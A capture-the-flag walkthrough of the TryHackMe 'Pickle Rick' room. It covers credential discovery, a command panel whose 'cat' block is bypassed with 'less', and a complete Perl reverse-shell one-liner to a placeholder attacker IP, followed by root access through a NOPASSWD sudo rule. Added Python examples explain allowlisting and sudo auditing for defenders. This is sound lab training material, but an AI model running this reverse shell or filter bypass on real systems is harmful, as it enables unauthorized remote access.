TryHackMe-Pickle Rick Walkthrough

INTRODUCTION

We begin with an Nmap scan and find ports 22 (SSH) and 80 (HTTP) open.

There is a webpage on port 80, and when we look at its source code (view-source) we find a username: R1ckRul3s

We use DirBuster to brute-force directories and run Nikto in parallel. We soon find a few paths such as /assets, /index.html, /login.php and /robots.txt.

Visiting /robots.txt shows a single string on the page: Wubbalubbadubdub

Interesting. This could be a password, and remember that we already found a username, R1ckRul3s, in the page source. We go to /login.php, enter the credentials, and we are finally in!

LOG IN AND YOU WILL GET THIS PAGE …

Looks like we can run commands here. After running “ls” we see a file named Sup3rS3cretPickl3Ingred.txt

However, we are unable to use the “cat” command to read the file. Trying a few other commands shows that “less” works where “cat” does not, which suggests that certain command names are simply blocked. But rather than banging our head against this web panel trying one command after another, it is better to get a reverse shell on our own terminal and explore the files and directories from there. “PentestMonkey” is the go-to place for reverse shell one-liners in different languages.
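To show why a panel that blocks “cat” but not “less” is only a speed bump, here is an added Python illustration (it is not the room's own login.php and does not claim to reproduce it). The first function models a word denylist, which rejects only what its author thought of; the second design never passes user text to a shell at all, because the client picks a named action and the server owns the exact argv. The blocked word and the allowed actions are constructed for the demonstration.

```python
import subprocess

# Constructed denylist: the kind of filter that stops "cat" but not "less".
BLOCKED_WORDS = {"cat"}


def denylist_allows(command: str) -> bool:
    """Weak filter: rejects a command only if one of its words is on the list.

    Any equivalent program the author did not enumerate passes straight through,
    which is the behaviour the command panel on this box shows.
    """
    return not any(word in BLOCKED_WORDS for word in command.split())


# Hardened design: the client names an action, the server supplies the argv.
# No user-controlled string is ever interpreted by a shell.
ALLOWED_ACTIONS = {
    "list": ["ls", "-l"],
    "disk": ["df", "-h"],
}


def allowlist_argv(action: str):
    """Return the fixed argv for a permitted action, or None if it is unknown."""
    return ALLOWED_ACTIONS.get(action)


def run_action(action: str, timeout: float = 5.0):
    """Execute a permitted action with shell=False; unknown actions return None."""
    argv = allowlist_argv(action)
    if argv is None:
        return None
    result = subprocess.run(argv, capture_output=True, text=True, timeout=timeout)
    return result.stdout


if __name__ == "__main__":
    for cmd in ("ls", "cat secret.txt", "less secret.txt"):
        print(f"denylist allows {cmd!r}: {denylist_allows(cmd)}")
    print(run_action("list"))
```

The point of the second half is that the fix for a command-injection panel is not a longer denylist; it is removing the shell from the data path, so that the only thing a user can choose is which pre-approved argv runs.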

We first try a netcat reverse shell, but it fails. The Perl reverse shell below finally worked. An interesting thing to remember: a reverse shell in one language can fail, so try several languages rather than just one. Trust me, this happens often in CTFs.

perl -e 'use Socket;$i="ATTACKER-IP";$p=LISTENING-PORT;
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Replace ATTACKER-IP and LISTENING-PORT with the IP of your attacking machine and the port your netcat listener is on, and we finally get a reverse shell!

We get our first flag. Notice carefully that there is also a text file here called clue.txt. Reading it tells us: “Look around the file system for the other ingredient.”

Moving to rick's home directory, we find the second flag.

I looked around a few more directories, and it seemed the third flag was in the root directory. Let's run “sudo -l” to see all the commands we can run as root. If you are not familiar with sudo -l, it is the first command you should always run when you want to privilege escalate, because it shows you the commands you are allowed to run as root.

We see that we can run ALL commands as root without any password!!! (see the last line XD)
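To make the sudo -l step concrete from the defender's side, here is an added Python example that is not part of the original walkthrough. It parses constructed sudo -l output (the hostname and the extra rules are invented; only the “(ALL) NOPASSWD: ALL” pattern reflects what the walkthrough describes) and rates each rule, so that an administrator reviewing a host can spot the misconfiguration before an attacker does. The remediation is to drop NOPASSWD and restrict the rule to the specific binaries that genuinely need it.

```python
import re

# Constructed sample of `sudo -l` output; hostname and the second and third
# rules are invented for the demonstration.
SAMPLE_SUDO_L = """\
Matching Defaults entries for www-data on examplehost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User www-data may run the following commands on examplehost:
    (ALL) NOPASSWD: ALL
    (root) NOPASSWD: /usr/bin/less
    (ALL) /usr/bin/apt update
"""

RULE_RE = re.compile(r"^\s*\(([^)]+)\)\s+(.*)$")   # "(runas) rest-of-rule"
TAG_RE = re.compile(r"^([A-Z]+):\s*")              # NOPASSWD:, SETENV:, ...


def parse_sudo_l(output: str):
    """Return the rule lines of `sudo -l` output as dicts: runas, tags, commands."""
    rules, in_rules = [], False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True          # everything after this header is a rule
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas, rest = m.group(1).strip(), m.group(2).strip()
        tags = []
        while (t := TAG_RE.match(rest)):   # peel off leading TAG: markers
            tags.append(t.group(1))
            rest = rest[t.end():]
        rules.append({"runas": runas, "tags": tags, "commands": rest.strip()})
    return rules


def severity(rule: dict) -> str:
    """Rate one rule; NOPASSWD on ALL is the pattern found on this box."""
    nopasswd = "NOPASSWD" in rule["tags"]
    any_cmd = rule["commands"] == "ALL"
    if nopasswd and any_cmd:
        return "critical"
    if nopasswd:
        return "high"
    if any_cmd:
        return "medium"
    return "info"


def audit_sudo_l(output: str):
    """Pair each parsed rule with its severity, worst first."""
    order = {"critical": 0, "high": 1, "medium": 2, "info": 3}
    rated = [(severity(r), r) for r in parse_sudo_l(output)]
    return sorted(rated, key=lambda sr: order[sr[0]])


if __name__ == "__main__":
    for sev, rule in audit_sudo_l(SAMPLE_SUDO_L):
        tags = "".join(t + ": " for t in rule["tags"])
        print(f"[{sev:8}] ({rule['runas']}) {tags}{rule['commands']}")
```

Run it against the real output of sudo -l on a host you administer and anything rated critical should be replaced with a password-required rule naming only the exact commands that account needs.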

With that, we finally find the third flag in the root directory! Bingo. I hope this walkthrough helped you learn something. Make sure to check out my other writeups on this platform.

I am a penetration tester, currently pursuing OSCP, skilled in network pen-testing and developing hacking tools using Python. I share my knowledge on YouTube.